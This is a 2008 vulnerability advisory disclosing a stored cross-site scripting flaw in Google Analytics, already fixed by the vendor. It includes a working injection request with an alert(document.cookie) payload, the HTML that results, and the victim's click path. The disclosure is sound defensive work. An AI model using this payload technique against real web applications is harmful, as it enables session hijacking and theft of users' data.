====================================================== ================= = Google Analytics - Stored Cross Site Scripting Vulnerability = = Vendor Website: = http://www.google.com = = Affected Version: = -- http://www.google.com/analytics/ = = Public disclosure on 8th December 2008 = ====================================================== ================== Available online at: http://www.security-assessment.com/files/advisories/20 08-12-08_Google_Analytics_Stored_Cross_Site_Scripting. pdf == Issue Details == Security-Assessment.com recently conducted a security review of the Google Analytics service, provided by Google Inc. Analysis discovered a stored Cross Site Scripting (XSS) vulnerability present in the Analytics web application. A malicious user is able to inject arbitrary browser content through web sites subscribed to the Google Analytics service. The script content injected was rendered into the Google Analytics Content Detail page which uses an Ajax-based menu to list the URL and the number of page views of the visited pages. The following URL points to the Google Analytics Content Detail page: URL: https://www.google.com/analytics/reporting/content_det ail JavaScript Vulnerable: goog.analytics.PropertyManager._getInstance()._broadca stChange() == Exploit Description - Attacker == A malicious user visits site xxx.com which is subscribed to the Google Analytics service and employs the Google Analytics JavaScript tracking code. The attacker performs the following request which includes the Cross Site Scripting payload and the Google Analytics JavaScript function broadcastChange(): Malicious GET Request: http://xxx.com/search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadca stChange("drilldown","/search.asp?keyword=test") In the example above, the broadcastChange function is used to terminate the malicious payload injection and to make the victim's browser execute the malicious script with no errors. The web server responds with HTTP Status 200. The URL of the page requested and the Cross Site Scripting payload is passed to the Google Analytics service through the JavaScript tracking code. The injected script content results as the following HTML being generated by the Google Analytics Content Detail page: <a title='/search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadca stChange("drilldown","/search.asp?keyword=test' href='javascript:goog.analytics.PropertyManager._getIn stance()._broadcastChange ("drilldown","/search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadca stChange("drilldown","/search.asp?keyword=test")'> /search.asp?keyword=test"); alert(document.cookie); goog.analytics.PropertyManager._getInstance()._broadca stChange("drilldown","/search.asp?keyword=test</a> == Exploit Description - Victim == The victim logs into Google Analytics service. The login page redirects the user to: https://www.google.com/analytics/settings/ The user clicks on the View Reports for its website (which was attacked with the injection described above). The user is redirected to a similar URL: https://www.google.com/analytics/reporting/?reset=1&id =xxxxxxx&scid=yyyyyyy The user accesses the Content Overview section and clicks on one of the listed pages. The user is then redirected to a similar URL (in this example, the user clicked on index.html): https://www.google.com/analytics/reporting/content_det ail?id=xxxxxxx&pdr=20080726-20080825&cmp=average&d1=%2 Findex.html In the Content Detail page for index.html, an Ajax-based menu lists the most visited pages and their relative page views. When the user clicks on the link of the page which was attacked, the browser executes the injected payload from the google.com domain. Eventually, the user is redirected to the Content Detail page for the search.asp?keyword=test entry. No JavaScript errors are returned to the JavaScript console. == Impact == Cross Site Scripting attacks can be used in combination with a browser exploitation framework such as BeEF, Browser Rider, Metasploit browser exploits, Backweb, Anehta, XSS Proxy and Backframe. These frameworks allow for complex JavaScript and browser-based exploit development. Other potential impacts include: * Hijacking users browser session; * Capturing sensitive information viewed by Google Analytics users; * Defacement of the Google Analytics website; * Port scanning of internal user hosts; * Directed delivery of additional browser-based exploits, such as ActiveX or URI handler exploits == Solution == Security-Assessment.com follows responsible disclosure and promptly contacted Google when the issue was first discovered. First contact with the vendor was made on the 25th August 2008. Confirmation of the vulnerability was made by Google on the 4th September 2008. On the 3rd December 2008, Google communicated to Security-Assessment.com that Google Analytics has been fixed. Security-Assessment.com performed a regression test on the same attack vector and confirmed the issue has been resolved. == Credit == Discovered and advised to Google Inc. August 2008 by Roberto Suggi Liverani of Security-Assessment.com Personal Page: http://malerisch.net == Greetings == Hello SA guys, Really L00king forward 'Hacking In The Sun'!!! ;-) == About Security-Assessment.com == Security-Assessment.com is a New Zealand based world leader in web application testing, network security and penetration testing. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us Web Site: www.security-assessment.com Roberto Suggi Liverani Security-Assessment.com